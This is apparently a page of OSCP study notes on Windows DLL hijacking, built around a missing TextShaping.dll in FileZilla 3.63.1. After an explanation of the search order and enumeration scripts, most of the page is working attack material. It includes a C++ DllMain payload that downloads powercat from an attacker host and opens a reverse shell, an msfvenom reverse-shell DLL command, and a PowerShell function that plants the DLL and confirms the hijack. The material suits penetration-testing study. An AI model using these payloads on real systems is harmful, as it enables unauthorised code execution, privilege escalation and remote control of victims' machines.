OSCP Notes

Service DLL Hijacking

Last updated 7 months ago

This attack is similar to Service Binary Hijacking, but instead of replacing the service executable it targets a DLL the application relies on.

Another approach is hijacking the DLL search order. When SafeDllSearchMode is enabled (the default), and the DLL is neither already loaded nor listed under KnownDLLs, Windows looks for it in this sequence:

1. The directory from which the application loaded.
2. The system directory (C:\Windows\System32).
3. The 16-bit system directory (C:\Windows\System).
4. The Windows directory (C:\Windows).
5. The current directory.
6. Directories in the PATH environment variable.

The first match wins, so any writable directory that is searched before the one holding the legitimate DLL (or before every directory, if the DLL is missing altogether) is a hijack point.

Exploiting a Missing DLL

List the installed applications on the machine:

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

The Wow6432Node key only lists 32-bit applications on 64-bit Windows; query the same Uninstall key without Wow6432Node for the 64-bit ones.

Research which of the installed applications are known to be vulnerable to DLL hijacking (Exploit Database entries such as the FileZilla one in the references are a good starting point).

The example below, FileZilla Client 3.63.1, is vulnerable to exactly this kind of attack: the application attempts to load TextShaping.dll, fails to find it in its own directory, and instead loads the copy from the System directory (2nd in the search order).

The following screenshot is from Procmon, showing the application's attempt to load TextShaping.dll from the directory from which the application loaded (1st in the search order), with the result NAME NOT FOUND. To hunt for such cases, filter Procmon on Result is NAME NOT FOUND and Path ends with .dll, restricted to the target's process name.
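The search-order list above and the application enumeration in this section both come down to two checks: which directory the loader will actually take the DLL from, and whether you can write to a directory that is searched earlier. The PowerShell below is an added example and not part of the original notes: Get-DllSearchCandidates walks the default SafeDllSearchMode order for one executable and DLL name, and Get-WritableServiceBinaryDirectory lists services whose binary directory the current user can write to, together with the account they run as. The function names and the probe-file write test are my own; the FileZilla path in the usage lines is the one used later on this page.

```powershell
function Test-DirectoryWritable {
    # Probe by actually creating a file: more reliable than reading the ACL,
    # since group membership, inherited ACEs and deny entries are all honoured.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    $probe = Join-Path $Path ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::WriteAllText($probe, '')
        Remove-Item -LiteralPath $probe -Force
        return $true
    } catch {
        return $false
    }
}

function Get-DllSearchCandidates {
    # Lists every directory the loader consults for $DllName when $ExePath runs,
    # in the order used when SafeDllSearchMode is enabled (the default).
    # KnownDLLs and already-loaded modules bypass this search entirely.
    param(
        [Parameter(Mandatory)][string]$ExePath,
        [Parameter(Mandatory)][string]$DllName
    )
    $dirs = @(
        @{ Stage = 'Application directory';   Path = Split-Path -Parent $ExePath }
        @{ Stage = 'System directory';        Path = [Environment]::SystemDirectory }
        @{ Stage = '16-bit system directory'; Path = Join-Path $env:SystemRoot 'System' }
        @{ Stage = 'Windows directory';       Path = $env:SystemRoot }
        @{ Stage = 'Current directory';       Path = (Get-Location).ProviderPath }
    )
    foreach ($p in ($env:Path -split ';')) {
        if ($p.Trim()) { $dirs += ,@{ Stage = 'PATH entry'; Path = $p.Trim() } }
    }
    $resolved = $false
    $order = 0
    foreach ($d in $dirs) {
        $order++
        $present  = Test-Path -LiteralPath (Join-Path $d.Path $DllName) -PathType Leaf
        $writable = Test-DirectoryWritable $d.Path
        [PSCustomObject]@{
            Order      = $order
            Stage      = $d.Stage
            Directory  = $d.Path
            DllPresent = $present
            Writable   = $writable
            # The first directory holding the DLL is the one that gets loaded; a
            # writable directory at or before that point is a hijack point (if
            # DllPresent is also true you would be overwriting the real copy).
            Hijackable = $writable -and -not $resolved
        }
        if ($present) { $resolved = $true }
    }
}

function Get-WritableServiceBinaryDirectory {
    # Services whose binary lives in a directory the current user can write to.
    # That directory is first in the search order for every DLL the service
    # binary loads, and a planted DLL would run as RunsAs.
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        if (-not $_.PathName) { return }
        # PathName is either "C:\path with spaces\svc.exe" args or C:\path\svc.exe args
        $exe = if ($_.PathName -match '^"([^"]+)"') { $Matches[1] }
               elseif ($_.PathName -match '^(.+?\.exe)') { $Matches[1] }
               else { ($_.PathName -split ' ')[0] }
        $dir = Split-Path -Parent $exe
        if (-not $dir) { return }
        [PSCustomObject]@{
            Service   = $_.Name
            RunsAs    = $_.StartName
            StartMode = $_.StartMode
            Exe       = $exe
            Directory = $dir
            Writable  = Test-DirectoryWritable $dir
        }
    } | Where-Object Writable
}

# Services you could hijack; RunsAs shows the privilege level you would gain.
Get-WritableServiceBinaryDirectory | Format-Table Service, RunsAs, StartMode, Directory

# Where FileZilla's TextShaping.dll really comes from, and where to plant one.
Get-DllSearchCandidates -ExePath 'C:\FileZilla\FileZilla FTP Client\filezilla.exe' -DllName 'TextShaping.dll' |
    Format-Table Order, Stage, Directory, DllPresent, Writable, Hijackable
```

In the FileZilla case the expected picture is DllPresent only in the System directory and Hijackable on the application directory, provided the installer left it writable. Note that the probe writes a real file, so it leaves a short-lived artifact in each directory it tests.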

Attack Path

To exploit this, place a malicious DLL named TextShaping.dll in the FileZilla directory so that when the application looks for the legitimate DLL it finds the attacker's version first and executes its code. This requires write access to that directory, and the payload runs with the privileges of whoever starts the application, so it only escalates privileges when that account is more privileged than yours (a service running as LocalSystem, or an administrator launching the program).

Creating The DLL

Using C++ it is possible to write a DllMain function, which Windows calls at fixed points in the DLL life cycle (process attach/detach, thread attach/detach). Code placed under DLL_PROCESS_ATTACH runs as soon as the DLL is loaded:

TextShaping.cpp
#include <windows.h>
#include <stdlib.h>   // system()

BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		// Runs once, when the application (or service) maps the DLL:
		// fetch powercat from the attacker's web server and open a reverse shell.
		system("powershell -c \"IEX (New-Object System.Net.Webclient).DownloadString('http://<attacker_ip>/powercat.ps1'); powercat -c <attacker_ip> -p <attacker_port> -e powershell\"");
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

Note that system() blocks until the spawned PowerShell exits, and DllMain runs while the loader lock is held, so the hijacked application hangs for as long as the reverse shell stays open. That is acceptable for a one-shot privilege escalation; if the application has to keep working, start the payload with CreateProcess (or from a new thread) instead.

Compile it:

x86_64-w64-mingw32-gcc TextShaping.cpp --shared -o TextShaping.dll

Alternatively, use msfvenom to generate the DLL:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o TextShaping.dll

Exploiting

Start a listener on the attacker machine first (and, for the C++ payload, serve powercat.ps1 from the same web server). Then download the DLL into the target directory, which must be writable by the current user:

iwr -uri http://<attacker_ip>/TextShaping.dll -OutFile 'C:\FileZilla\FileZilla FTP Client\TextShaping.dll'

As soon as the application is started again (restart the service, or relaunch the program) the loader maps the planted DLL, DllMain executes and the reverse shell connects back.
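The plant, trigger and verify steps above as one PowerShell function, with the checks a practitioner wants before and after: do not clobber an existing file, tolerate a service that cannot be restarted, and confirm which copy of the DLL the process actually mapped. This is an added example and not part of the original notes: Invoke-DllHijack and its parameters are my own names, and the FileZilla path and DLL name are the ones used on this page.

```powershell
function Invoke-DllHijack {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$DllUrl,     # attacker-hosted DLL
        [Parameter(Mandatory)][string]$TargetDir,  # directory searched before the real DLL
        [Parameter(Mandatory)][string]$DllName,    # name the application asks for
        [string]$ServiceName,                      # restart this service to trigger the load
        [string]$ProcessName                       # process (without .exe) to inspect afterwards
    )
    $dest = Join-Path $TargetDir $DllName
    # Do not clobber an existing file: if the DLL is already here the application
    # is not missing it, and overwriting it is a different attack.
    if (Test-Path -LiteralPath $dest) {
        throw "$dest already exists; pick an earlier search-order directory or a different DLL"
    }
    Invoke-WebRequest -Uri $DllUrl -OutFile $dest -UseBasicParsing
    Write-Host "[*] planted $dest ($((Get-Item -LiteralPath $dest).Length) bytes)"

    if ($ServiceName) {
        # Needs stop/start rights on the service; a low-privileged user usually
        # lacks them, in which case the hijack fires at the next reboot instead.
        try { Restart-Service -Name $ServiceName -Force -ErrorAction Stop }
        catch { Write-Warning "cannot restart ${ServiceName}: $($_.Exception.Message); wait for a reboot" }
    }

    if ($ProcessName) {
        Start-Sleep -Seconds 5
        # Confirm which copy was mapped. Module enumeration needs query rights on
        # the process and the same bitness, so a SYSTEM service inspected from a
        # low-privileged shell shows nothing; rely on the listener in that case.
        $loaded = Get-Process -Name $ProcessName -ErrorAction SilentlyContinue |
            ForEach-Object { try { $_.Modules } catch { @() } } |
            Where-Object { $_.ModuleName -ieq $DllName }
        foreach ($m in $loaded) {
            $state = if ($m.FileName -ieq $dest) { 'planted copy (hijacked)' } else { 'legitimate copy' }
            Write-Host "[+] $($m.FileName) -> $state"
        }
        if (-not $loaded) { Write-Warning "$DllName not seen in $ProcessName (not loaded yet, or no access)" }
    }
}

# Usage with the page's FileZilla example; the listener must already be running.
Invoke-DllHijack -DllUrl 'http://<attacker_ip>/TextShaping.dll' `
    -TargetDir 'C:\FileZilla\FileZilla FTP Client' -DllName 'TextShaping.dll' -ProcessName 'filezilla'
```

Because the C++ payload blocks inside DllMain, the module check works while the shell is open: the process is alive and the planted file shows up in its module list. Remove the DLL once you are done, or the application keeps spawning shells on every start.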

References

FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking (Exploit Database)
Dynamic-link library search order (Microsoft Docs, Win32 apps)
Process Monitor (Sysinternals, Microsoft Docs)